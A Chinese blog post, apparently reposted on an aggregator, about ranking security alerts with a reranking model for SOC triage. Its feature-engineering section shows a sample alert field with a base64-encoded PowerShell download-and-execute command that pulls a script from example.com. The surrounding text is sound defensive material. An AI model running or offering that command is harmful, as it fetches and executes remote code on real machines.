KART-RERANK在网络安全中的应用:恶意流量与日志的智能分析排序

news2026/3/21 12:07:17
KART-RERANK在网络安全中的应用恶意流量与日志的智能分析排序你是不是也遇到过这种情况每天一上班安全运营中心的屏幕上就弹出来成百上千条告警从“可疑登录尝试”到“异常外联流量”密密麻麻一片。你得像大海捞针一样一条条去排查生怕漏掉哪个真正的高危攻击。结果呢忙活一整天发现大部分都是误报或者是一些低风险的扫描探测真正需要紧急处理的威胁可能就藏在某条不起眼的日志里。这种“告警疲劳”几乎是每个安全分析师的日常。数据太多有效信息太少关键威胁被淹没在噪音里。今天我们就来聊聊一个能帮你从这片“数据海洋”里精准打捞出“大鱼”的工具——KART-RERANK。它不是要生成新的告警而是帮你把已有的、混乱的告警和日志按照真实威胁的可能性重新排个队让你一眼就能看到最该关注的那几条。1. 网络安全分析师的困境在噪音中寻找信号想象一下你管理的企业网络每天产生数以TB计的网络流量和安全日志。入侵检测系统、防火墙、终端防护软件都在兢兢业业地工作但它们带来的副作用就是海量的告警。这些告警大致可以分为三类关键高危告警比如勒索软件加密行为、高级持续性威胁的横向移动、核心数据的外泄。这类必须立即处置。中低风险告警比如端口扫描、暴力破解尝试但未成功、来自可疑地区的访问。需要关注但优先级可以靠后。噪音与误报系统误判、正常的业务变更被识别为异常、或者一些无关紧要的扫描流量。这类最耗精力也最容易让人麻木。问题在于传统的安全信息与事件管理SIEM系统或者安全运营平台往往按照时间顺序或者简单的规则优先级来展示告警。一个失败的登录尝试和一个正在进行的数据库拖库攻击可能因为发生时间接近而并列显示。分析师宝贵的时间和注意力就这样被大量低价值告警消耗掉了。我们需要的是一个“智能过滤器”和“优先级调度员”这正是KART-RERANK可以发挥作用的地方。它的核心思想不是替代现有的检测规则而是对现有检测引擎输出的结果进行“二次加工”和“智能排序”。2. KART-RERANK是什么给安全告警排个“智能队”简单来说KART-RERANK是一个重排序模型。你可以把它理解为一个经验丰富的安全专家他快速浏览一遍当天所有的告警清单然后凭经验告诉你“嘿先看第5、第12、第23条这几条最像真的攻击其他的可以先放一放。”技术上它通常基于像BERT这类强大的自然语言处理模型进行微调。为什么NLP模型能看懂安全告警因为告警日志本质也是文本数据。一条告警里包含了源IP、目的IP、端口、协议、行为描述、时间戳、威胁等级等信息。KART-RERANK通过学习海量的历史安全事件数据包括哪些是最终被确认的真实攻击哪些是误报学会从这些文本特征中识别出真正代表高危威胁的模式。举个例子模型可能会学会同时包含“powershell”、“encoded command”、“external IP”等关键词的告警比单纯一个“multiple failed login”的告警更可能关联到真实的入侵。从内部服务器发往某个已知恶意软件C2服务器域名的出向连接其风险远高于一次来自随机IP的端口扫描。在短时间内由同一台主机触发的一系列不同种类的告警如登录失败后紧接着出现异常进程创建其综合风险评分应该被大幅提升。KART-RERANK做的就是这件事它接收一个原始的、未经排序或简单排序的告警列表然后为列表中的每一个告警计算一个“相关性得分”或“风险置信度得分”最后按照这个得分从高到低重新输出列表。分析师只需要从排在最前面的告警开始调查即可。3. 实战构建面向威胁重排序的训练数据要让KART-RERANK模型学会正确排序关键是要喂给它高质量的“教材”。这比想象中要复杂因为我们需要的不只是“好样本”和“坏样本”而是“不同好坏程度的样本对”。3.1 数据来源与标注你的训练数据主要来自历史SIEM告警日志和对应的安全事件处置工单Ticket。原始告警日志收集过去6-12个月内所有的原始告警数据每条记录应包含完整字段。事件处置记录这是黄金标签的来源。需要将告警与最终的安全事件报告进行关联。一条告警可能确认为真实攻击True Positive, TP并标记其严重等级如危急、高、中、低。判定为误报False Positive, FP。无法确定或无需处置。构建排序对这是训练重排序模型的核心。我们不是简单地进行二分类攻击/非攻击而是要构建“偏序对”。例如告警A被确认为“高危”真实攻击告警B被判定为“误报”。那么模型应该学会给A的打分高于B。我们记作(A, B)为一个训练对目标是在排序中A应在B之前。再如告警C危急勒索软件和告警D中危扫描即使两者都是TPC也应排在D之前。训练对为(C, D)。3.2 特征工程把告警日志变成模型能理解的“语言”原始日志需要转化为模型输入的特征。这里可以分为结构化特征和文本特征。结构化特征数值/类别威胁情报匹配度源/目的IP、域名是否在威胁情报库中匹配的置信度分数。资产关键性受影响的主机是普通办公电脑还是核心数据库服务器可以赋予一个权重值。时间衰减因子刚发生的告警通常比24小时前的告警更紧急。告警聚合数量同一类型告警在短时间内的爆发次数。文本特征NLP模型主要处理的部分告警名称/描述如“Suspicious PowerShell Execution with Obfuscation”。行为详情字段如“process: cmd.exe - powershell.exe -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAOwBpAGUAeAAgACgAJABzAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAHAAYQB5AGwAbwBhAGQALgBwAHMAMQAnACkAKQA”。用户/主机名有时攻击者会使用特定的账号或主机命名模式。我们可以将结构化特征进行归一化后与文本特征经过BERT模型编码后的向量进行拼接共同输入到一个全连接层最终输出一个风险得分。3.3 一个简化的数据准备示例假设我们有以下两条已标注的历史告警// 告警 A (真实高危攻击) { alert_id: A001, timestamp: 2023-10-27T14:30:00Z, alert_name: Malicious PowerShell Execution, description: Obfuscated PowerShell script detected downloading payload from known bad IP 1.2.3.4., src_ip: 10.0.1.15, dst_ip: 1.2.3.4, severity: High, asset_value: 8, // 核心服务器分值高 ti_match: 0.95, // 威胁情报高匹配 label: TP_HIGH // 标签真实攻击-高危 } // 告警 B (误报) { alert_id: B002, timestamp: 2023-10-27T14:35:00Z, alert_name: Multiple Failed Logins, description: 5 failed login attempts for user testuser from IP 5.6.7.8., src_ip: 5.6.7.8, dst_ip: 10.0.0.10, severity: Medium, asset_value: 3, // 普通办公电脑 ti_match: 0.0, // 无威胁情报匹配 label: FP // 标签误报 }在训练时我们会生成一个排序对(A001, B002)告诉模型对于这个查询比如“找出当前最高危的告警”告警A001的相关性/风险应该高于B002。4. 将KART-RERANK集成到你的安全运营流程模型训练好了怎么把它用起来它不应该是一个孤立的系统而应该无缝嵌入现有的SOC安全运营中心工作流。4.1 集成架构思路一个典型的集成方案可以是这样[ 数据源 ] -- [ 检测引擎 ] -- [ 原始告警队列 ] | | | | | v | | [ KART-RERANK 重排序服务 ] | | | | | v | | [ 排序后告警列表 ] -- [ SIEM / SOAR / 分析师控制台 ] | | | | | v | | [ 反馈循环 ] -- [ 模型持续优化 ]数据流各类日志和流量经过检测引擎规则、机器学习模型产生原始告警送入一个消息队列如Kafka。重排序服务KART-RERANK服务作为消费者从队列中拉取一段时间窗口内的告警例如过去15分钟的所有告警。它提取每条告警的特征调用模型进行推理计算出风险得分然后按得分降序排序。结果呈现排序后的告警列表被推送到SIEM控制台或专用的安全运营平台界面。最关键的几条告警会置顶显示并可以用高亮颜色标注。反馈闭环分析师在调查处置后将告警的最终判定结果TP/FP及等级通过平台反馈回来。这些新的标注数据被收集用于定期重新训练或微调模型使其越来越准。4.2 在SIEM中的具体应用以常见的SIEM为例集成方式可以是自定义仪表板组件开发一个面板专门显示经过KART-RERANK重排序后的“Top N高危告警”。告警列表默认视图修改告警列表的默认排序逻辑从“按时间降序”改为“按模型风险分降序”。与SOAR联动风险分极高的告警可以直接触发SOAR剧本Playbook进行自动化隔离、阻断或信息收集为分析师争取时间。实际使用中你可能会发现模型排序靠前的告警其调查确认率即TP率远远高于列表靠后的告警。这意味着分析师能用更少的时间找到更多真正的威胁工作效率和成就感都会大幅提升。5. 效果与展望不仅仅是排序在我们实际的测试和应用中引入KART-RERANK重排序后安全团队最直观的感受是“告警噪音小了目标清晰了”。分析师不再需要从第一条开始逐条筛查而是直接聚焦于列表头部那10%-20%的高风险告警这部分告警中真实威胁的占比往往能提升到50%以上。更重要的是这种思路打开了新的可能性跨检测源关联排序模型可以同时接收来自防火墙、IDS、EDR、云安全产品的告警并基于统一的“风险视角”进行排序打破了产品间的数据孤岛。减少规则调优的负担与其花费大量精力精细调整每条检测规则的阈值以减少误报不如让一个“智能层”在后期统一处理排序问题允许前端检测规则保持较高的灵敏度。自适应与持续学习网络威胁在变化模型也能通过反馈闭环持续学习新的攻击模式适应企业独特的IT环境。当然它也不是银弹。模型的性能严重依赖于训练数据的质量和代表性。如果历史数据中缺乏某种新型攻击的样本模型可能暂时无法将其排序到高位。因此将其作为分析师的“智能助手”而非“全自动决策系统”人机协同才是最佳实践。获取更多AI镜像想探索更多AI镜像和应用场景访问 CSDN星图镜像广场提供丰富的预置镜像覆盖大模型推理、图像生成、视频生成、模型微调等多个领域支持一键部署。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2428893.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

SpringBoot-17-MyBatis动态SQL标签之常用标签

文章目录 1 代码1.1 实体User.java1.2 接口UserMapper.java1.3 映射UserMapper.xml1.3.1 标签if1.3.2 标签if和where1.3.3 标签choose和when和otherwise1.4 UserController.java2 常用动态SQL标签2.1 标签set2.1.1 UserMapper.java2.1.2 UserMapper.xml2.1.3 UserController.ja…

wordpress后台更新后 前端没变化的解决方法

使用siteground主机的wordpress网站,会出现更新了网站内容和修改了php模板文件、js文件、css文件、图片文件后,网站没有变化的情况。 不熟悉siteground主机的新手,遇到这个问题,就很抓狂,明明是哪都没操作错误&#x…

网络编程(Modbus进阶)

思维导图 Modbus RTU(先学一点理论) 概念 Modbus RTU 是工业自动化领域 最广泛应用的串行通信协议,由 Modicon 公司(现施耐德电气)于 1979 年推出。它以 高效率、强健性、易实现的特点成为工业控制系统的通信标准。 包…

UE5 学习系列(二)用户操作界面及介绍

这篇博客是 UE5 学习系列博客的第二篇,在第一篇的基础上展开这篇内容。博客参考的 B 站视频资料和第一篇的链接如下: 【Note】:如果你已经完成安装等操作,可以只执行第一篇博客中 2. 新建一个空白游戏项目 章节操作,重…

IDEA运行Tomcat出现乱码问题解决汇总

最近正值期末周,有很多同学在写期末Java web作业时,运行tomcat出现乱码问题,经过多次解决与研究,我做了如下整理: 原因: IDEA本身编码与tomcat的编码与Windows编码不同导致,Windows 系统控制台…

利用最小二乘法找圆心和半径

#include <iostream> #include <vector> #include <cmath> #include <Eigen/Dense> // 需安装Eigen库用于矩阵运算 // 定义点结构 struct Point { double x, y; Point(double x_, double y_) : x(x_), y(y_) {} }; // 最小二乘法求圆心和半径 …

使用docker在3台服务器上搭建基于redis 6.x的一主两从三台均是哨兵模式

一、环境及版本说明 如果服务器已经安装了docker,则忽略此步骤,如果没有安装,则可以按照一下方式安装: 1. 在线安装(有互联网环境): 请看我这篇文章 传送阵>> 点我查看 2. 离线安装(内网环境):请看我这篇文章 传送阵>> 点我查看 说明&#xff1a;假设每台服务器已…

XML Group端口详解

在XML数据映射过程中&#xff0c;经常需要对数据进行分组聚合操作。例如&#xff0c;当处理包含多个物料明细的XML文件时&#xff0c;可能需要将相同物料号的明细归为一组&#xff0c;或对相同物料号的数量进行求和计算。传统实现方式通常需要编写脚本代码&#xff0c;增加了开…

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器的上位机配置操作说明

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器专为工业环境精心打造&#xff0c;完美适配AGV和无人叉车。同时&#xff0c;集成以太网与语音合成技术&#xff0c;为各类高级系统&#xff08;如MES、调度系统、库位管理、立库等&#xff09;提供高效便捷的语音交互体验。 L…

(LeetCode 每日一题) 3442. 奇偶频次间的最大差值 I (哈希、字符串)

题目&#xff1a;3442. 奇偶频次间的最大差值 I 思路 &#xff1a;哈希&#xff0c;时间复杂度0(n)。 用哈希表来记录每个字符串中字符的分布情况&#xff0c;哈希表这里用数组即可实现。 C版本&#xff1a; class Solution { public:int maxDifference(string s) {int a[26]…

【大模型RAG】拍照搜题技术架构速览:三层管道、两级检索、兜底大模型

摘要 拍照搜题系统采用“三层管道&#xff08;多模态 OCR → 语义检索 → 答案渲染&#xff09;、两级检索&#xff08;倒排 BM25 向量 HNSW&#xff09;并以大语言模型兜底”的整体框架&#xff1a; 多模态 OCR 层 将题目图片经过超分、去噪、倾斜校正后&#xff0c;分别用…

【Axure高保真原型】引导弹窗

今天和大家中分享引导弹窗的原型模板&#xff0c;载入页面后&#xff0c;会显示引导弹窗&#xff0c;适用于引导用户使用页面&#xff0c;点击完成后&#xff0c;会显示下一个引导弹窗&#xff0c;直至最后一个引导弹窗完成后进入首页。具体效果可以点击下方视频观看或打开下方…

接口测试中缓存处理策略

在接口测试中&#xff0c;缓存处理策略是一个关键环节&#xff0c;直接影响测试结果的准确性和可靠性。合理的缓存处理策略能够确保测试环境的一致性&#xff0c;避免因缓存数据导致的测试偏差。以下是接口测试中常见的缓存处理策略及其详细说明&#xff1a; 一、缓存处理的核…

龙虎榜——20250610

上证指数放量收阴线&#xff0c;个股多数下跌&#xff0c;盘中受消息影响大幅波动。 深证指数放量收阴线形成顶分型&#xff0c;指数短线有调整的需求&#xff0c;大概需要一两天。 2025年6月10日龙虎榜行业方向分析 1. 金融科技 代表标的&#xff1a;御银股份、雄帝科技 驱动…

观成科技:隐蔽隧道工具Ligolo-ng加密流量分析

1.工具介绍 Ligolo-ng是一款由go编写的高效隧道工具&#xff0c;该工具基于TUN接口实现其功能&#xff0c;利用反向TCP/TLS连接建立一条隐蔽的通信信道&#xff0c;支持使用Let’s Encrypt自动生成证书。Ligolo-ng的通信隐蔽性体现在其支持多种连接方式&#xff0c;适应复杂网…

铭豹扩展坞 USB转网口 突然无法识别解决方法

当 USB 转网口扩展坞在一台笔记本上无法识别,但在其他电脑上正常工作时,问题通常出在笔记本自身或其与扩展坞的兼容性上。以下是系统化的定位思路和排查步骤,帮助你快速找到故障原因: 背景: 一个M-pard(铭豹)扩展坞的网卡突然无法识别了,扩展出来的三个USB接口正常。…

未来机器人的大脑:如何用神经网络模拟器实现更智能的决策?

编辑&#xff1a;陈萍萍的公主一点人工一点智能 未来机器人的大脑&#xff1a;如何用神经网络模拟器实现更智能的决策&#xff1f;RWM通过双自回归机制有效解决了复合误差、部分可观测性和随机动力学等关键挑战&#xff0c;在不依赖领域特定归纳偏见的条件下实现了卓越的预测准…

Linux应用开发之网络套接字编程(实例篇)

服务端与客户端单连接 服务端代码 #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <arpa/inet.h> #include <pthread.h> …

华为云AI开发平台ModelArts

华为云ModelArts&#xff1a;重塑AI开发流程的“智能引擎”与“创新加速器”&#xff01; 在人工智能浪潮席卷全球的2025年&#xff0c;企业拥抱AI的意愿空前高涨&#xff0c;但技术门槛高、流程复杂、资源投入巨大的现实&#xff0c;却让许多创新构想止步于实验室。数据科学家…

深度学习在微纳光子学中的应用

深度学习在微纳光子学中的主要应用方向 深度学习与微纳光子学的结合主要集中在以下几个方向&#xff1a; 逆向设计 通过神经网络快速预测微纳结构的光学响应&#xff0c;替代传统耗时的数值模拟方法。例如设计超表面、光子晶体等结构。 特征提取与优化 从复杂的光学数据中自…